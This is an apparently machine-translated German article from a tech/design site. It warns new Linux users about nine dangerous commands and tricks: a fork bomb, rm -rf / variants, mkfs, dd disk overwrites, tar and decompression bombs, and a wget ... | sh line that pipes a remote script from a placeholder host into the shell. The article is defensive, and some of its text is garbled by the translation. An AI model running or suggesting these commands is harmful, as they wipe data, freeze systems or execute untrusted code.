de.hideout-lastation.com
Paradies Für Designer Und Entwickler


9 Linux Commands & Codes, denen Sie sich aussetzen sollten

Linux-Shell / Terminal-Befehle sind sehr mächtig und nur ein einfacher Befehl kann dazu führen, dass ein Ordner, Dateien oder Stammordner gelöscht wird usw.

In einigen Fällen wird Linux Sie nicht einmal zur Bestätigung auffordern, sondern es wird den Befehl sofort ausführen, wodurch Sie wertvolle Daten und Informationen verlieren, die in diesen Dateien und Ordnern gespeichert sind.

Es ist üblich, dass Leute Inhalte im Internet posten, die neuen Linux-Benutzern empfehlen, diese Befehle auszuführen . Dies mag für jemanden, der den Inhalt gepostet hat, wie ein Scherz erscheinen, aber es ist keine Lacherei für die Person am anderen Ende.

Wir haben einige Linux-Befehle zusammengestellt, die für Ihr System sehr schädlich sind, damit Sie sie vermeiden können. Bedenke, dass sie in der Tat gefährlich sind und sogar auf verschiedene Arten verändert werden können, um neue Befehle zu erzeugen, die mehr Schaden zufügen.

Es ist wichtig zu beachten, dass einige dieser Befehle nur gefährlich sind, wenn ihnen auf Ubuntu Sudo vorangestellt ist . Während auf anderen Linux-Distributionen die meisten dieser gegebenen Befehle gefährlich sind, können sie als root ausgeführt werden.

Werfen Sie einen Blick auf die 9 Befehle und Codes, die Sie nicht ausführen sollten.

1. Linux Fork Bomb Befehl

:(){ :|: & };: auch bekannt als Fork Bomb ist eine Denial-of-Service-Attacke gegen ein Linux-System. :(){ :|: & };: ist eine Bash-Funktion. Sobald es ausgeführt wird, wiederholt es sich mehrmals, bis das System einfriert .

Sie können es nur loswerden, indem Sie Ihr System neu starten. Seien Sie also vorsichtig, wenn Sie diesen Befehl in Ihrer Linux-Shell ausführen.

2. mv Ordner / dev / null Befehl

mv folder/dev/null ist ein weiterer gefährlicher Befehl. Dev/null oder null device ist eine Gerätedatei, die alle darauf geschriebenen Daten verwirft, aber meldet, dass der Schreibvorgang erfolgreich ausgeführt wurde . Es ist auch bekannt als bit bucked oder schwarzes Loch .

3. Befehl rm -rf

rm -rf Befehl ist eine schnelle Möglichkeit, einen Ordner und seinen Inhalt im Linux-Betriebssystem zu löschen . Wenn Sie nicht wissen, wie man es richtig benutzt, kann es sehr gefährlich für das System werden. Die häufigsten Kombinationen und Optionen, die mit dem Befehl rm-rf verwendet werden, sind nachfolgend aufgeführt:

  • rm Befehl rm wird zum Löschen der Dateien im Linux-System verwendet.
  • rm -f Befehl rm -f schreibgeschützte Dateien im Ordner ohne Eingabeaufforderung entfernt.
  • rm -r Befehl rm -r löscht den Inhalt eines Ordners rekursiv.
  • rm -d Befehl wird verwendet, um ein leeres Verzeichnis zu entfernen, aber es wird sich weigern, das Verzeichnis zu entfernen, wenn es nicht leer ist.
  • rm -rf/ command wird für das erzwungene Löschen (es löscht es selbst wenn es schreibgeschützt ist) des gesamten Inhalts im Stammverzeichnis und den Unterordnern verwendet.
  • rm -rf* Befehl rm -rf* wird zum erzwungenen Löschen des gesamten Inhalts im aktuellen Verzeichnis (Verzeichnis, in dem Sie gerade arbeiten) und Unterordnern verwendet.
  • rm -rf. Der Befehl wird zum erzwungenen Löschen des gesamten Inhalts im aktuellen Ordner und in den Unterordnern verwendet. Der Befehl rm -r.[^.]* Kann ebenfalls verwendet werden.
  • rm -i Befehl rm -i wird zum Entfernen von Dateien und Ordnern verwendet. Vor dem Entfernen wird jedoch eine Eingabeaufforderung angezeigt.

4. Befehl mkfs

mkfs kann ein gefährlicher Befehl für Ihr Linux-basiertes System sein, wenn Sie seinen Zweck nicht kennen. Alles, was nach dem mkfs geschrieben wird, wird formatiert und durch ein leeres Linux-Dateisystem ersetzt .

Alle unten genannten Befehle formatieren die Festplatte und erfordern Administratorrechte:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

Der Befehl mkfs.cramfs wird dasselbe tun wie oben, benötigt jedoch keine Administratorrechte.

5. Tar Bombe

Der Befehl tar wird verwendet, um mehrere Dateien in einer einzelnen Datei (archivierte Datei) im .tar- Format zu kombinieren. Eine Tape-Archiv (Tar) -Bombe kann mit diesem Befehl erstellt werden.

Es ist eine Archivdatei, die in Tausende oder Millionen von Dateien mit Namen, die den vorhandenen Dateien ähneln, in das aktuelle Verzeichnis und nicht in ein neues Verzeichnis explodiert, wenn sie entpackt werden.

Sie können vermeiden, Opfer einer Bombe zu werden, indem Sie regelmäßig ein neues Schutzverzeichnis erstellen, wenn Sie eine TAR-Datei erhalten, und dann die empfangene TAR-Datei vor dem Entpacken in dieses Verzeichnis verschieben.

Wenn die TAR-Datei tatsächlich eine Tar-Bombe ist, können Sie einfach das neu erstellte Verzeichnis entfernen, um es loszuwerden. Eine andere Möglichkeit, die Explosion einer Teerbombe zu vermeiden, besteht darin, über die Option -t den gesamten Inhalt einer tar-Datei aufzulisten, um eine Vorstellung von dem Inhaltstyp zu erhalten, der in der tar-Datei enthalten ist.

6. dd Befehl

Der Befehl dd wird zum Kopieren und Konvertieren von Festplattenpartitionen verwendet . Es kann sich jedoch als schädlich erweisen, wenn Sie das falsche Ziel angeben.

Der Befehl kann einer von diesen sein:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

Der folgende Befehl löscht die gesamte primäre Festplatte: dd if=/dev/zero of=/dev/had

7. Shell-Skriptcode

Jemand kann Sie zu Opfern machen, indem er Ihnen den Link zu einem Shell-Skript gibt und Sie zum Herunterladen und Ausführen ermuntert . Das Skript enthält möglicherweise bösartigen oder gefährlichen Code. Das Format des Befehls kann wie wget http://some_malicious_source -O- | sh aussehen: wget http://some_malicious_source -O- | sh wget http://some_malicious_source -O- | sh . Das wget lädt das Skript herunter, während der sh die Skriptausführung herunterlädt.

8. Bösartiger Quellcode

Jemand gibt Ihnen den Quellcode und bittet Sie, ihn zu kompilieren. Der Code scheint ein normaler Code zu sein, aber tatsächlich ist ein Teil des bösartigen Codes im großen Quellcode getarnt und kann Ihrem System Schaden zufügen. Um zu verhindern, dass diese Art von Angriffen Opfer wird, akzeptieren und kompilieren Sie Ihren Quellcode nur aus vertrauenswürdigen Quellen .

9. Dekompressionsbombe

Sie haben eine komprimierte Datei erhalten, und Sie werden aufgefordert, diese Datei zu extrahieren, die sehr klein aussieht, aber einige KB groß sein kann. Tatsächlich enthält diese kleine komprimierte Datei sehr stark komprimierte Daten .

Sobald die Datei dekomprimiert ist, werden Hunderte von GB Daten extrahiert, die Ihre Festplatte füllen können, um die Leistung Ihres Systems zu verringern. Um dies zu vermeiden, denken Sie immer daran, Daten aus vertrauenswürdigen Quellen zu akzeptieren.

25 kreative Preistabelle Designs für Inspiration

25 kreative Preistabelle Designs für Inspiration

Preistabellen werden normalerweise von Unternehmen verwendet, die während des Anmeldeprozesses Premium-Services und -Produkte anbieten. Zweifellos kann eine gut gestaltete Preistabelle mehr Kunden anlocken und mehr Verkäufe umsetzen . Daher ist es wichtig, die Preistabelle oder -seite so klar und benutzerfreundlich wie möglich zu gestalten. A

(Tech- und Design-Tipps)

Bestes Design Freebies des Jahres 2017

Bestes Design Freebies des Jahres 2017

Im vergangenen Jahr haben wir einen enormen Anstieg der Anzahl von Design-Blogs und PSD-Galerien erlebt. Der große Teil hier ist Web-Designer und Grafik-Designer sind mehr daran interessiert, ihre Ideen zu teilen und arbeitet mit dem Internet, und diese großartige Einstellung brachte mehrere Premium-Design-Freebies aus der ganzen Welt!I

(Tech- und Design-Tipps)